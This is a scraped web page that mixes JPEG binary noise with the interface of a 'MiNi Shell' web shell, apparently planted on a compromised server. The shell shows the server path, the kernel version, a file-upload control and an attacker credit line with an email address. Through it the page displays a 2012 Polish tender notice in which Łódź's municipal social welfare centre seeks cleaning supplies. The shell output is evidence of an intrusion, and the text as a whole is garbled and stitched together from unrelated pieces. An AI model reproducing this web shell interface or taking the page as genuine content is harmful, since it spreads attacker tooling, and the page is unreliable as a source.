JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/90504-N-2012.html

<p class="kh_header"><b>Łódź: zakup i dostawa środków czystości dla potrzeb placówek Miejskiego Ośrodka Pomocy
Społecznej w Łodzi</b><br>
<b>Numer ogłoszenia: 90504 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa środków czystości dla potrzeb placówek Miejskiego Ośrodka Pomocy
Społecznej w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Oznaczenie według Wspólnego Słownika Zamówień CPV:
39800000-0
2. Przedmiot zamówienia: przedmiotem zamówienia jest zakup i dostawa środków
czystości dla potrzeb placówek Miejskiego Ośrodka Pomocy Społecznej w Łodzi.
3.Przedmiot zamówienia oraz szacunkowe ilości wyszczególnione zostały w załączniku
nr 1a do niniejszej specyfikacji istotnych warunków zamówienia -  Pakiet asortymentowy
środki czystości.
4. Wykonawca zapewni dostawę przedmiotu zamówienia sukcesywnie, własnym transportem
i na własny koszt bez obciążenia z tego tytułu Zamawiającego dodatkowymi kosztami .
5. Dostawy odbywać się będą w terminach uzgodnionych z Zamawiającym każdorazowo,
na podstawie zamówienia określającego asortyment oraz ilość, składanego przez
Zamawiającego. Zamówienie może być złożone telefonicznie, potwierdzone faksem lub
e-mailem.
6. Wykonawca będzie dostarczać zamówione środki czystości na adres wskazany przez
Zamawiającego w terminie nie dłuższym niż 48 godzin od chwili otrzymania zamówienia.
7. Dostawy odbywać się będą od poniedziałku do piątku w godzinach 9.00-14.00.
8. Miejscem realizacji dostaw przedmiotu zamówienia będą niżej wymienione placówki
Wydziałów Pracy Środowiskowej:
I Wydział Pracy Środowiskowej, Łódź, ul. Tybury 16:
1) Dom Dziennego Pobytu, Łódź, ul. Rojna 52,
2) Dom Dziennego Pobytu, Łódź, ul. Wrocławska 10,
3) Dom Dziennego Pobytu, Łódź, ul. Organizacji WIN 37,
4) Dom Dziennego Pobytu Dla Osób Niepełnosprawnych, Łódź,
ul. Rojna 18a,
5) Świetlica Środowiskowa, Łódź, ul. Tybury 16
6) Dom Dziennego Pobytu, Łódź, ul. Borowa 6,
II Wydział Pracy Środowiskowej, Łódź, ul. Grota Roweckiego 30
1) Dom Dziennego Pobytu , Łódź, Al. Kościuszki 29,
2) Dom Dziennego Pobytu, Łódź, ul. Narutowicza 37,
3) Dom Dziennego Pobytu, Łódź, ul. Piotrkowska 203/205,
4) Dom Dziennego Pobytu, Łódź, ul. Jaracza 36,
5) Dom Dziennego Pobytu, Łódź, ul. Ćwiklińskiej 18,
6) Dom Dziennego Pobytu, Łódź, ul. Grota Roweckiego 30,
7) Dom Dziennego Pobytu, Łódź, ul. Smetany 4,
8)Dom Dziennego Pobytu Dla Osób Niepełnosprawnych, Łódź,
ul. Ćwiklińskiej 5a,
9) Świetlica Środowiskowa, Łódź, ul. Ćwiklińskiej 5a,
10) Świetlica Środowiskowa, Łódź, ul. Smetany 4,
11) Dom Dziennego Pobyty, Łódź, ul. Fabryczna 19,
12) Dom Dziennego Pobytu, Łódź, ul. Zbocze 2a,
III Wydział Pracy Środowiskowej, Łódź, ul. Będzińska 5
1) Dom Dziennego Pobytu, Łódź, ul. Lelewela 17,
2) Dom Dziennego Pobytu, Łódź, ul. Obywatelska 69,
3) Dom Dziennego Pobytu, Łódź, ul. Senatorska 4,
4) Świetlica Środowiskowa, Łódź, ul. Senatorska 4,
2
5) Schronisko dla Bezdomnych Kobiet, Łódź, ul. Gałczyńskiego 7,
6) Dom Dziennego Pobytu, Łódź, ul. 1 Maja 24-26
oraz Miejski Zespół ds. Orzekania o Niepełnosprawności w Łodzi , Łódź, ul. Lecznicza 6
9.Przedmiot umowy musi być fabrycznie nowy, posiadający oryginalne fabrycznie opakowanie,
wolny od wad, w jakości 1, dopuszczony do obrotu - posiadać atest PZH oraz posiadać
aktualny termin ważności.
10.Przedmiot zamówienia musi być zgodny z obowiązującymi przepisami systemu HACCP.
11.Każda dostawa środków czystości musi być opakowana w sposób umożliwiający jego
identyfikację (ilość, rodzaj). Opakowanie musi zawierać następujące dane:
- nazwę środka czystości,
- datę minimalnej trwałości albo termin przydatności ,
- dane identyfikacyjne producenta środka czystości,
- dane identyfikujące kraj, w którym wyprodukowano środek czystości
- liczbę sztuk środka czystości w opakowaniu,
- warunki przechowywania, w przypadku gdy jego jakość zależy od warunków przechowywania
- oznaczenie partii produkcji,
- sposób użycia i dozowania
- klasę jakości handlowej.
12. Zamawiający będzie miał prawo do przesunięcia ilości środków czystości pomiędzy
poszczególnymi asortymentami pakietu asortymentowego w ramach wartości brutto zawartej
umowy.
13. Zamawiający będzie miał prawo do niewykorzystania pełnego limitu ilościowego przedmiotu
zamówienia bez prawa do roszczeń z tego tytułu przez Wykonawcę.
14. Na każde żądanie Zamawiającego, Wykonawca będzie zobowiązany okazać w stosunku do
każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskimi.
15. Wykonawca zobowiązany będzie do przyjęcia zwrotu i wymiany wadliwych towarów
niespełniających wymagań określonych w przepisach lub uszkodzonych w wyniku transportu
na własny koszt.
16. Środki czystości objęte przedmiotem zamówienia będą posiadały, co najmniej roczny okres
przydatności do użytku licząc od dnia dostawy.
17. W przypadku ujawnienia wad jakościowych dostarczonych środków czystości, których nie
można było stwierdzić w chwili dostawy, Wykonawca w terminie 48 godzin od zgłoszenia
wady, dokona wymiany wadliwego towaru na wolny od wad.
18.Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż zaproponowane równoważne
środki czystości odbiegają niekorzystnie od parametrów produktu oryginalnego - ich
wydajność, jakość i niezawodność - Wykonawca na żądanie Zamawiającego oferowane środki
czystości, których żądanie dotyczy, wymieni bez zmiany ceny na inne spełniające wymagania
Zamawiającego.
19. Faktura będzie wystawiana na adres Zamawiającego.
20. Ceny jednostkowe netto określone w ofercie są cenami stałymi i nie mogą ulec zmianie przez
cały okres trwania umowy.
21. Należność za dostawę będzie płatna w terminie do 21 dni od daty dostarczenia faktury
Zamawiającemu.
22.Wykonawca będzie zobowiązany do poddania się kontroli realizacji umowy przez
Zamawiającego i udzielania ewentualnych wyjaśnień w wyznaczonym przez niego terminie.
23.Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent
3
czy pochodzenie - należy przyjąć, że Zamawiający ze względu na specyfikę przedmiotu
zamówienia podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych,
o parametrach nie gorszych niż te podane w opisie przedmiotu zamówienia - podstawa prawna
art. 29 ust. 3 ustawy Prawo zamówień publicznych.
24.Wymagania stawiane Wykonawcy:
1)Wykonawca jest odpowiedzialny za jakość opisaną dla przedmiotu zamówienia,
2)wymagana jest należyta staranność przy realizacji zobowiązań umowy,
3)ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez
Zamawiającego z ustanowionym przedstawicielem Wykonawcy,
4)określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń
niezbędnych dla sprawnego i terminowego wykonania zamówienia,
5)Wykonawca jest obowiązany do monitorowania wartości umowy.
6)Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę
podczas wykonywania przedmiotu zamówienia.
25.Zamawiający ma prawo rozwiązać umowę bez zachowania okresu wypowiedzenia
w przypadku trzykrotnej reklamacji dotyczącej nienależytego wykonania umowy,
a w szczególności wystąpienia przypadków:
a) stwierdzenia nieważności dostarczonego artykułu;
b) dostarczenia innego asortymentu niż zamówiony;
c) dostarczenia artykułów w terminie nie uzgodnionym z Zamawiającym;
d) dostarczenia ilości artykułów niezgodnych z zamówieniem.
26.Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
27.Zamawiający nie dopuszcza składania ofert wariantowych zgodnie z art. 83 ust. 1 ustawy
Prawo zamówień publicznych.
28.Zamawiający nie dopuszcza składania ofert częściowych.
29.Zamawiający nie przewiduje aukcji elektronicznej w niniejszym postępowaniu.
30.Zamawiający nie przewiduje możliwości udzielenia zamówień dodatkowych lub
uzupełniających zgodnie z art. 67 ust. 1 pkt 6 i 7 ustawy Prawo zamówień publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z art.45 ust. 2 ustawy Prawo zamówień publicznych Zamawiający nie wymaga
wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie przez Wykonawcę wykazu wykonanych, a w przypadku
świadczeń okresowych lub ciągłych również wykonywanych dostaw w zakresie
niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, w okresie
ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie
do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie
4
dokumentu potwierdzającego, że dostawy zostały wykonane należycie - Załącznik Nr 5
do SIWZ.
Uszczegółowienie:
Warunek zostanie spełniony, jeżeli Wykonawca w wyżej wymienionym okresie,
w każdym roku tego okresu wykonał 1 dostawę przedmiotu zamówienia o wartości nie
mniejszej niż 20 000 zł, oraz załączył stosowne dokumenty potwierdzające należyte
wykonanie tych dostaw - Załącznik Nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, ze posiada w całym okresie
trwania umowy opłaconą polisę na kwotę nie mniejszą niż 50 000 zł, a w przypadku jej
braku inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od
odpowiedzialności cywilnej kontraktowej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uml.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi
 ul. Piotrkowska 149.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi
ul. Piotrkowska 149
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com